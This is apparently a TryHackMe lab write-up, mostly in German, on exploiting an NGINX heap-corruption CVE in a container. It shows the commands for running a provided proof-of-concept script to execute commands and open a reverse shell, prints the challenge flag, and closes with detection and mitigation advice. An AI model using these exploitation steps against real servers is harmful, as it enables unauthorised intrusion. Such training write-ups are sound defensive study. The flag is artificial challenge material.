
This lab demonstrates the exploitation of CVE-2024-24945, a heap corruption vulnerability affecting NGINX. The objective was to understand how memory corruption can lead to Remote Code Execution (RCE) and gain practical experience in exploitation, detection, and mitigation techniques.
Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptions-Schwachstelle, die NGINX betrifft. Ziel war es zu verstehen, wie Speicherkorruption zu Remote Code Execution (RCE) führen kann, und praktische Erfahrungen in Exploitation, Erkennung und Abwehrtechniken zu sammeln.
. Den anfälligen NGINX-Dienst überprüfen. . Beliebige Befehle mit dem bereitgestellten Proof of Concept (PoC) ausführen. . Eine Reverse Shell auf dem Zielcontainer erhalten. . Die Herausforderungsflagge abrufen. . Erkennungs- und Abwehrstrategien verstehen.
. Plattform: TryHackMe . Zieldienst: NGINX RIFT . Containerisierte Umgebung: Docker . Exploit-Tool: poc.py . Zugriffsmethode: VNC (Virtual Network Computing)
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
Backend in Ordnung
Führte den bereitgestellten PoC aus, um die Ausführung beliebiger Befehle zu validieren.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Erfolgreiche Ausführung überprüft:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Ausgabe: hello from depthfirst
Eine interaktive Shell auf dem Zielcontainer einrichten.
python3 poc.py --shell
Erfolgreiche Verbindung:
[] Warte auf Reverse-Shell auf Port 1337... [] verbunden. $
Auf die Herausforderungsflagge zugegriffen.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
Verteidiger können Ausnutzungsversuche identifizieren durch:
. NGINX-Worker-Abstürze . Segmentation-Fault-Ereignisse . Unerwartete ausgehende Netzwerkverbindungen . Verdächtige Shell-Prozesse (/bin/sh,bash) . Unbefugte Dateierstellung in temporären Verzeichnissen
. Aktualisierung auf eine gepatchte NGINX-Version. . Anwendung des Prinzips der minimalen Rechte . . Einschränkung unnötigen ausgehenden Netzwerkverkehrs Implementieren Sie kontinuierliches Log-Monitoring. . Verwenden Sie Container-Sicherheitskontrollen und Laufzeitüberwachung
Dieses Labor bot praktische Erfahrungen in:
. Verständnis von Heap-Korruptions-Schwachstellen. . Ausnutzung von Remote-Code-Execution-Fehlern. . Einrichtung von Reverse Shells. . Durchführung von Post-Exploitation-Validierung. . Erkennung von Kompromittierungsindikatoren und Abwehrtechniken.
Diese Übung wurde in einer kontrollierten TryHackMe-Laborumgebung durchgeführt nur für Bildungs- und defensive Cybersicherheitstrainingszwecke.
Autor: [Benedict Ejepu Amaechi] Plattform: TryHackMe Thema: CVE-2024-24945 NGINX RIFT Exploitation und Verteidigung Datum der Fertigstellung: Juni 2026